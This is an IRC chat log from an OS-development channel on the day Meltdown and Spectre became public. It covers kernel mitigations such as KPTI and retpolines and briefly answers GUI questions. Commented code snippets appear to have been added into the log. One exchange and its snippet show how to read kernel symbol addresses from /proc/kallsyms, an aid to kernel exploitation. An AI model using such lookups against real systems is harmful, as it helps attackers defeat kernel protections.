18:23:22 <radens> geist: what's going on there? Do both the bl 2f and b . branches share a slot in the branch prediction table or something?
18:23:55 <geist> dunno precisely
18:23:58 <Mutabah> Iirc, x30 is the link register
18:23:58 <variable> some great and readable code
18:24:16 <Mutabah> So... the `bl` stores in the ret stack that the next `ret` will go to the `b .`
18:24:28 <geist> yeah i think that's the idea
18:24:37 <Mutabah> but since x30 has been changed, the `ret` actually goes to the actual vector code
18:24:45 <Mutabah> which means that the `ret` is mispredicted
18:24:51 <geist> yeah
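(An illustrative reconstruction in aarch64 assembly of the trick Mutabah just decoded, not the exact kernel code: the bl primes the return-address predictor with the dead loop after it, then x30 is overwritten so the ret architecturally goes to the real vector while any misprediction lands harmlessly.)

    __asm__(
        "vector_stub:\n"
        "    bl   1f\n"        // predictor records return addr = next insn
        "    b    .\n"         // ...which is this dead loop
        "1:  adr  x30, 2f\n"   // clobber the link register with the real target
        "    ret\n"            // deliberately mispredicted
        "2:  nop\n"            // actual vector body would follow here
    );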
18:24:57 <variable> kind of sucks that this is done in a way that is difficult to change later should CPU vendors ever fix the underlying flaw
18:25:28 <Mutabah> The above? Not really hard to change... and probably isn't really expensive in the scheme of things?
18:25:34 --- quit: daniele_athome (Ping timeout: 252 seconds)
18:25:52 <variable> Mutabah: by hard to change, I mean in a way that can be done at run/compile time
18:25:56 <variable> not "git revertable"
18:25:58 <Mutabah> Ah.
18:26:11 <Mutabah> Depends on the size of this trampoline, could just be bypassed
18:26:18 <Mutabah> (as in, a separate code path)
18:26:42 <variable> there is a *lot* of micro-optimization that was happening over the years
18:26:43 <Kazinsal> I mean we should have been doing something like FUCKWIT from the start
18:26:45 <radens> the kernel page table isolation stuff is all runtime configurable
18:26:49 <variable> in the scheme of things it may not matter
18:27:05 <variable> but still, kind of sad to lose all of that
18:27:40 --- join: daniele_athome (~daniele_a@93-40-14-81.ip36.fastwebnet.it) joined #osdev
18:29:07 <radens> however, there's also a mitigation for the indirect branching attack being discussed on the LKML today, which replaces all indirect branches in the kernel with pushes and rets. Which is interesting because then we might be able to attack the return address predictor, and that sort of indirect push and ret is still a very nice gadget for other attacks.
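(The push+ret construct radens mentions, which later circulated under the name "retpoline", sketched as top-level GCC asm for x86-64; loosely after the LKML discussion, not the exact patch. The indirect target goes through a ret whose prediction is captured by a harmless spin loop instead of the attacker-trainable BTB.)

    /* jump to the address in %rax without an indirect jmp */
    __asm__(
        ".text\n"
        ".global jump_indirect_rax\n"
        "jump_indirect_rax:\n"
        "    call 1f\n"            /* pushes the address of the trap below */
        "2:  pause\n"              /* speculation lands here and spins     */
        "    jmp  2b\n"
        "1:  mov  %rax, (%rsp)\n"  /* overwrite return address with target */
        "    ret\n"                /* 'returns' to *%rax                   */
    );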
18:30:48 <geist> Kazinsal: really much of this is due to the way x86's page tables work, and the fact that it's such a win to have it mapped all the time
18:30:57 <geist> not all arches have had this problem, but x86 and ARM are basically what we're left with
18:31:13 <geist> and ARM is just straight up copying x86 as far as overall design of this sort of thing. wisely, really
18:32:22 --- quit: awordnot (Read error: Connection reset by peer)
18:32:42 --- join: awordnot (~awordnot@67.184.137.130) joined #osdev
18:34:02 <raphaelsc> has anybody found a way to implement speculative syscall table lookup? like this one: https://i.imgur.com/mCVHKwQ.jpg anyway, i think i can wait for security researchers to release the demo next week ;-)
18:36:03 <radens> raphaelsc: you may find appendix A of this paper interesting, although it's not what you're looking for: https://spectreattack.com/spectre.pdf
18:37:00 --- join: uvgroovy (~uvgroovy@c-65-96-163-219.hsd1.ma.comcast.net) joined #osdev
18:37:01 --- quit: uvgroovy (Remote host closed the connection)
18:38:16 --- quit: rmx86k (Quit: Leaving)
18:38:48 --- join: uvgroovy (~uvgroovy@2601:184:4980:e75:7c6d:11a4:1efc:1289) joined #osdev
18:40:41 <geist> hmm, reading through the ARM KAISER patches, sadly the ASID bits do not seem to be quite as flexible as i thought
18:40:55 <geist> so i think you realistically have to TLB swap the kernel as well
18:41:23 <geist> or more specifically, you can't share kernel TLB entries across context switches, you have to switch to a new kernel ASID, thus causing it to bring in all new entries
18:41:47 <geist> since ARM has two top level translation tables for both halves of the system, but only a single ASID globally
18:42:34 <radens> it kind of seems like ARM could have dodged this bullet by having the two TTBRs not share a single TLB.
18:42:36 --- join: curiosity_freak (~naveen@157.50.12.253) joined #osdev
18:43:11 <curiosity_freak> anyone here know about developing GUI for os?
18:43:35 <Mutabah> A bit... fire away
18:43:37 <geist> without the KAISER thing it's almost perfectly ideal, because you just mapped the kernel with the nG bit (opposite polarity to x86's G bit)
18:43:57 <geist> and thus the kernel was always in functionally a separate ASID from the TLBs point of view
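(For reference, the nG mechanics geist is pointing at, as a sketch: bit 11 is the architectural nG position in arm64 stage-1 descriptors, while the macro and function names are invented. User mappings set nG so their TLB entries are ASID-tagged; kernel mappings leave it clear and are shared across all ASIDs, the inverse polarity of x86's G bit.)

    #include <stdint.h>

    #define PTE_NG (1ULL << 11)   /* not-global: entry is tagged with the ASID */

    uint64_t make_user_pte(uint64_t pa, uint64_t attrs) {
        return pa | attrs | PTE_NG;   /* private to the current ASID */
    }

    uint64_t make_kernel_pte(uint64_t pa, uint64_t attrs) {
        return pa | attrs;            /* global: survives ASID switches */
    }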
18:43:58 <klange> curiosity_freak: sure
18:44:19 <curiosity_freak> i know about FPS - frame per second
18:44:40 <curiosity_freak> every second screen is redrawn multiple times.
18:45:06 <curiosity_freak> where are these pixel values stored, and how are they calculated?
18:45:28 <curiosity_freak> if there are any books or other resources, please suggest them
18:45:38 <curiosity_freak> i haven't been able to sleep for a few days
18:45:49 <curiosity_freak> it keeps popping up in my mind
18:46:05 <curiosity_freak> your help would be really appreciated.
18:46:21 <raphaelsc> radens: thanks.
18:47:38 <curiosity_freak> klange: you there?
18:47:53 <klange> I would start with literally anything about the basics of computer graphics.
18:48:04 <klange> GUIs are not about graphics, despite what the G stands for
18:48:16 --- quit: variable (Quit: Found 1 in /dev/zero)
18:49:00 <curiosity_freak> any book to learn about working of GUI deeply
18:49:12 --- quit: uvgroovy (Ping timeout: 265 seconds)
18:49:33 <curiosity_freak> i searched google a lot but could not find any resources on the internals of GUIs
18:50:20 --- join: quc (~quc@host-89-230-166-189.dynamic.mm.pl) joined #osdev
18:50:42 --- join: regreg_ (~regreg@85.121.54.224) joined #osdev
18:50:52 <freakazoid0223> https://meltdownattack.com/meltdown.pdf https://spectreattack.com/spectre.pdf
18:52:09 <curiosity_freak> klange: are you busy?
18:52:12 <geist> freakazoid0223: welcome to earlier today
18:52:17 <klange> i'm sick, actually
18:52:24 <klange> which is worse than busy
18:52:31 <Kazinsal> Trying to find post-update Windows benchmarks for Zen
18:53:10 <Kazinsal> klange: disappointed high five, sick buddy
18:53:26 <klange> let's not touch each other, might spread things one way or the other
18:53:26 <freakazoid0223> thats not just the news reports those are a lot more in depth
18:53:30 <Mutabah> curiosity_freak: In a modern compositing GUI structure - there's a "framebuffer" for every window, and then another framebuffer for every monitor.
18:54:13 <Mutabah> curiosity_freak: Applications draw to their window framebuffer, then tell the compositor that it's changed and the compositor will copy from the window buffer to the monitor buffer (which is then read by the graphic card periodically to send to the screen)
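(A tiny C sketch of the compositing step Mutabah describes: each window owns its own pixel buffer, and the compositor copies it into the monitor framebuffer at the window's position. All structs and names here are invented for illustration.)

    #include <stdint.h>
    #include <string.h>

    struct window {
        uint32_t *pixels;   /* the window's own framebuffer (ARGB) */
        int x, y, w, h;     /* position and size on the screen     */
    };

    void composite(uint32_t *screen, int screen_w, const struct window *win) {
        for (int row = 0; row < win->h; row++) {
            /* copy one scanline of the window into the screen buffer */
            memcpy(&screen[(win->y + row) * screen_w + win->x],
                   &win->pixels[row * win->w],
                   win->w * sizeof(uint32_t));
        }
    }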
18:55:22 <curiosity_freak> Mutabah: thank you! is there any resources to learn about it? so i won't disturb you for my silly questions.
18:55:38 <Mutabah> I don't know of any off the top of my head
18:55:54 <curiosity_freak> Mutabah: it's okay
18:56:05 <Kazinsal> It's not really something I think books generally get written on
18:56:29 --- quit: raph_ael (Quit: WeeChat 1.9.1)
18:56:32 <curiosity_freak> fine.
18:56:38 <Kazinsal> The art of the GUI was originally trial and error, which got us such horrors as X11
18:56:47 <doug16k> curiosity_freak, look at some GUI frameworks to get an idea of what you need to do
18:56:58 --- part: lijero left #osdev
18:57:51 <curiosity_freak> doug16k: sure , i am going to have a look
19:00:38 --- quit: Belxjander (Ping timeout: 248 seconds)
19:01:19 <doug16k> curiosity_freak, and have a look at FreeType for font rendering. Get some basic line drawing, rectangle filling, bitblt (copy rectangle from here to there) code working
19:02:17 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
19:02:27 <curiosity_freak> doug16k: thank you
19:04:12 --- quit: curiosity_freak (Quit: Leaving)
19:06:26 <Kazinsal> Amazing. Mozilla's mitigation for this is to reduce the resolution of the Firefox performance timer to 20 microseconds
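(What that mitigation boils down to: quantize the clock so the tens-of-nanoseconds gap between a cache hit and a miss disappears below the granularity. Sketched here with POSIX clock_gettime; the 20 µs figure is Mozilla's, the names are illustrative.)

    #include <stdint.h>
    #include <time.h>

    #define GRANULARITY_NS 20000ULL   /* 20 microseconds */

    uint64_t coarse_now_ns(void) {
        struct timespec ts;
        clock_gettime(CLOCK_MONOTONIC, &ts);
        uint64_t ns = (uint64_t)ts.tv_sec * 1000000000ULL + ts.tv_nsec;
        return ns - (ns % GRANULARITY_NS);   /* round down to the grain */
    }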
19:09:34 --- quit: Belxjander (Ping timeout: 256 seconds)
19:09:38 --- join: aosfields_ (~aosfields@71.194.3.30) joined #osdev
19:12:11 --- quit: adam4813 (Quit: Connection closed for inactivity)
19:12:18 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
19:12:25 --- join: uvgroovy (~uvgroovy@2601:184:4980:e75:7c6d:11a4:1efc:1289) joined #osdev
19:18:51 <jjuran> Not sure if sarcastic
19:22:00 --- quit: aosfields_ (Remote host closed the connection)
19:23:03 --- quit: darklink (Ping timeout: 265 seconds)
19:23:17 --- join: darklink (~darklink@unaffiliated/darklink) joined #osdev
19:26:49 --- join: aosfields_ (~aosfields@71.194.3.30) joined #osdev
19:26:50 <Kazinsal> KPTI patches for ESXi 5.5, 6.0, 6.5 are out
19:31:13 <Kazinsal> Linux 4.15 will be disabling FUCKWIT on AMD
19:32:13 <latentprion> AMD stock price up
19:32:18 <latentprion> INTC stock price down
19:32:49 <_mjg> well, it did turn out there was confusion
19:33:00 <_mjg> everyone thought there is *one* vuln and amd does not have it
19:33:29 <geist> right
19:33:56 <__pycache__> Kazinsal: they merged that one?
19:33:58 <__pycache__> whew
19:34:10 <__pycache__> AMD execs must be smug as hell right now
19:34:14 <geist> well, there was always a switch to disable it
19:34:22 <__pycache__> geist: pti=off iirc
19:34:26 <geist> a CONFIG option too
19:34:26 <__pycache__> at kernel cmdline
19:34:34 <__pycache__> oh?
19:35:05 <geist> it's also unclear to me how bad the performance hit is for earlier cpus, like sandy bridge or so
19:35:09 <geist> that dont have PCID
19:35:33 <__pycache__> geist: should it be worse or better?
19:35:39 <Kazinsal> Worse
19:35:46 <__pycache__> rip
19:35:46 <Kazinsal> PCID reduces the hit by about half
19:36:21 <__pycache__> would KPTI be safe to disable on an intel core i7-4790 processor which I use for browsing the web, compiling, sshing and the occasional steam on linux?
19:37:03 <geist> maybe, but then why do it?
19:37:08 <Kazinsal> We don't have any concrete numbers for the performance hits on anything earlier than Broadwell-E and nothing for AMD sadly
19:37:10 <Mutabah> __pycache__: No*
19:37:15 <Kazinsal> I wouldn't say it's safe to disable KPTI
19:37:20 <geist> none of what you're talking about there actually would be much affected by KPTI anyway
19:37:37 <Kazinsal> Because you know the day that the PoC goes public someone's going to inject it into some bad ads
19:38:00 --- quit: navidr (Quit: Connection closed for inactivity)
19:38:04 <geist> Ads Gone Bad!
19:39:45 <_mjg> have you seen what they propose for another vuln?
19:39:51 <__pycache__> Mutabah: what's the *
19:40:06 <Mutabah> well... depends on how much you trust the websites you visit :)
19:40:09 <_mjg> https://lkml.org/lkml/2018/1/3/780
19:40:09 <Kazinsal> A pointer to no!
19:40:09 <bslsk05> ​lkml.org: LKML: Andi Kleen: Avoid speculative indirect calls in kernel
19:40:28 <Mutabah> And tbh, I haven't grasped the full extent of all of these vulns yet
19:40:43 <Mutabah> I don't know if KPTI has anything to do with what javascript can do
19:41:47 --- nick: heddwch -> spartacus
19:42:00 --- join: unixpickle (~alex@2601:645:8103:60b6:fca3:1b63:480e:59aa) joined #osdev
19:43:08 <__pycache__> if JS can trick the VM for reading the cache lines somehow maybe
19:43:16 <__pycache__> then it'd be a VM exploit
19:43:20 --- quit: uvgroovy (Ping timeout: 265 seconds)
19:43:27 --- nick: spartacus -> heddwch
19:46:02 --- join: Phanes (~Phanes@phanes.silogroup.org) joined #osdev
19:46:02 --- quit: Phanes (Changing host)
19:46:02 --- join: Phanes (~Phanes@surro/founder/phanes) joined #osdev
19:49:35 --- quit: Phanes (K-Lined)
19:56:22 <__pycache__> mozilla claims in a blog post that "web technologies" can trigger this
19:56:25 <__pycache__> oops!
20:04:11 --- quit: zng (Ping timeout: 268 seconds)
20:05:30 <pictron> anyone here know how to get the location of the kernel in a process' space on a linux kernel *without* KASLR?
20:05:48 <Mutabah> Usually hard-coded
20:10:11 <_mjg> see /boot/System.map*
20:23:28 <raphaelsc> also /proc/kallsyms
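(Without KASLR those are fixed, build-time addresses; with a readable /proc/kallsyms you can simply look a symbol up, as raphaelsc suggests. A minimal C sketch; note that kptr_restrict may zero the addresses for unprivileged users.)

    #include <stdio.h>
    #include <string.h>

    unsigned long find_ksym(const char *name) {
        char sym[256];
        unsigned long addr = 0, a;
        char type;
        FILE *f = fopen("/proc/kallsyms", "r");
        if (!f) return 0;
        while (fscanf(f, "%lx %c %255s", &a, &type, sym) == 3) {
            if (strcmp(sym, name) == 0) { addr = a; break; }
        }
        fclose(f);
        return addr;
    }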
20:24:25 <raphaelsc> i found a program that stresses meltdown but i'm still unable to find data in the L1 cache, apparently. Maybe I'm unable to read it.
20:28:36 <raphaelsc> Mutabah: it's about unmapping most of the kernel from userspace page tables
20:28:37 * Mutabah is away (Lunchtime)
20:29:06 --- join: variable (~variable@freebsd/developer/variable) joined #osdev
20:29:29 <raphaelsc> Mutabah: so syscall heavy apps will see a huge perf degradation, given that the ring 0 -> 3 switch now requires switching page tables, which involves a TLB flush
20:29:45 <geist> not necessarily. depends on if you have PCID feature or not
20:29:52 <geist> which is approximately Haswell and above
20:29:59 <geist> that mitigates the cost a bit
20:30:03 --- nick: promach__ -> promach_
20:30:21 <_mjg> wait for the other mitigation
20:30:48 <_mjg> if both the kernel and all userspace gets recompiled with an equivalent of https://lkml.org/lkml/2018/1/3/780
20:31:11 <_mjg> i would say it's going to be bad
20:32:10 <raphaelsc> geist: thanks for the explanation
20:33:52 --- quit: Darmor (Quit: Leaving)
20:34:54 <raphaelsc> geist: https://gist.github.com/dougallj/f9ffd7e37db35ee953729491cfb71392
20:34:56 <bslsk05> ​gist.github.com: x86-64 Speculative Execution Harness · GitHub
20:42:39 <variable> _mjg: now you're stalking me here too
20:43:25 <_mjg> i'm reasonably certain i was here first
20:43:31 <variable> _mjg: geist: I wonder if it might just be faster to turn off speculative execution
20:43:42 <variable> if that's even possible
20:43:50 <variable> also, I wonder how fixable this is with microcode updates
20:46:18 <geist> dunno
20:47:36 --- join: sprocklem (~sprocklem@unaffiliated/sprocklem) joined #osdev
20:47:40 <_mjg> well the question is how it would impact prefetching
20:51:12 <geist> guess it depends on what the fix would be
20:52:03 <_mjg> so now that the attackers provided a write up, i would really like to hear what hardware people have to say
20:52:21 <_mjg> even while not revealing anything secret there should be a lot to say
20:53:31 --- quit: pictron (Ping timeout: 268 seconds)
20:54:30 <bcos> _mjg: I'd assume hardware vendors are going to say "give us $$ to upgrade to our latest and greatest CPU (that we think is fixed now)"
20:55:34 * bcos is thinking about buying shares in Intel while the prices are at their lowest...
20:59:20 <raphaelsc> a guest was never able to access the host's memory, even speculatively, right? I do not see how kernel memory isolation in a host can change anything in a guest.
20:59:51 <raphaelsc> i wonder how meltdown will actually effect cloud providers
20:59:51 <variable> bcos: ++
21:00:45 <raphaelsc> s/effect/affect
21:03:22 --- join: oaken-source (~oaken-sou@p3E9D3430.dip0.t-ipconnect.de) joined #osdev
21:03:23 --- quit: Belxjander (Ping timeout: 268 seconds)
21:04:20 --- quit: quc (Ping timeout: 240 seconds)
21:04:28 --- quit: awang_ (Ping timeout: 260 seconds)
21:05:26 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
21:07:30 --- join: osa1 (~omer@213.14.66.114) joined #osdev
21:07:30 --- quit: osa1 (Changing host)
21:07:30 --- join: osa1 (~omer@haskell/developer/osa1) joined #osdev
21:10:17 --- join: quc (~quc@host-89-230-164-119.dynamic.mm.pl) joined #osdev
21:13:49 --- quit: raiz (Quit: rebooting...)
21:17:52 --- join: raiz (~raiz@fardan.info) joined #osdev
21:22:53 --- join: zwliew (uid161395@gateway/web/irccloud.com/x-skfnbbbnkvfbhixs) joined #osdev
21:26:38 --- quit: Belxjander (Ping timeout: 260 seconds)
21:28:58 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
21:40:03 --- quit: quc (Remote host closed the connection)
21:40:19 --- join: quc (~quc@host-89-230-164-119.dynamic.mm.pl) joined #osdev
21:45:13 --- quit: srjek (Ping timeout: 252 seconds)
21:46:00 --- join: eremitah_ (~int@unaffiliated/eremitah) joined #osdev
21:47:02 --- quit: freakazoid0223 (Quit: Call me a relic, call me what you will. Say I'm old fashioned, say I'm over the hill.)
21:47:06 --- quit: eremitah (Ping timeout: 256 seconds)
21:47:06 --- nick: eremitah_ -> eremitah
21:48:58 --- quit: Belxjander (Ping timeout: 240 seconds)
21:55:33 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
22:05:22 --- quit: unixpickle (Quit: My MacBook has gone to sleep. ZZZzzz…)
22:06:25 --- quit: Humble (Ping timeout: 265 seconds)
22:06:41 --- join: xenos1984 (~xenos1984@2001:bb8:2002:200:6651:6ff:fe53:a120) joined #osdev
22:10:30 --- quit: aosfields_ (Ping timeout: 248 seconds)
22:12:06 --- quit: variable (Quit: Found 1 in /dev/zero)
22:17:50 --- join: Humble (~hchiramm@2405:204:d287:4ff8:cfc7:2654:a737:6fff) joined #osdev
22:21:44 --- quit: Belxjander (Ping timeout: 248 seconds)
22:24:32 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
22:28:06 --- quit: oaken-source (Ping timeout: 248 seconds)
22:35:36 --- quit: Belxjander (Ping timeout: 248 seconds)
22:36:33 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
22:43:30 --- quit: xiphias (Remote host closed the connection)
22:45:58 --- quit: Belxjander (Ping timeout: 260 seconds)
22:48:03 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
22:53:51 --- quit: wcstok (Read error: Connection reset by peer)
22:58:00 --- quit: empy (Ping timeout: 248 seconds)
22:58:50 --- join: empy (~l@c-24-56-245-159.customer.broadstripe.net) joined #osdev
22:58:50 --- quit: empy (Changing host)
22:58:50 --- join: empy (~l@unaffiliated/vlrvc2vy) joined #osdev
23:00:01 --- join: oaken-source (~oaken-sou@141.89.226.146) joined #osdev
23:02:06 --- quit: Burgundy (Read error: Connection reset by peer)
23:08:42 --- quit: dbittman (Ping timeout: 276 seconds)
23:15:34 --- quit: Humble (Ping timeout: 240 seconds)
23:29:37 --- join: Humble (~hchiramm@2405:204:d409:4aee:ed60:203d:492d:7ad3) joined #osdev
23:29:58 --- quit: Belxjander (Ping timeout: 248 seconds)
23:36:38 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
23:38:15 --- join: bm371613 (~bartek@2a02:a317:603f:9800:391:ed9f:1c09:1285) joined #osdev
23:39:31 --- join: nzoueidi (~nzoueidi@ubuntu/member/na3il) joined #osdev
23:55:58 --- quit: Belxjander (Ping timeout: 260 seconds)
23:59:59 --- log: ended osdev/18.01.03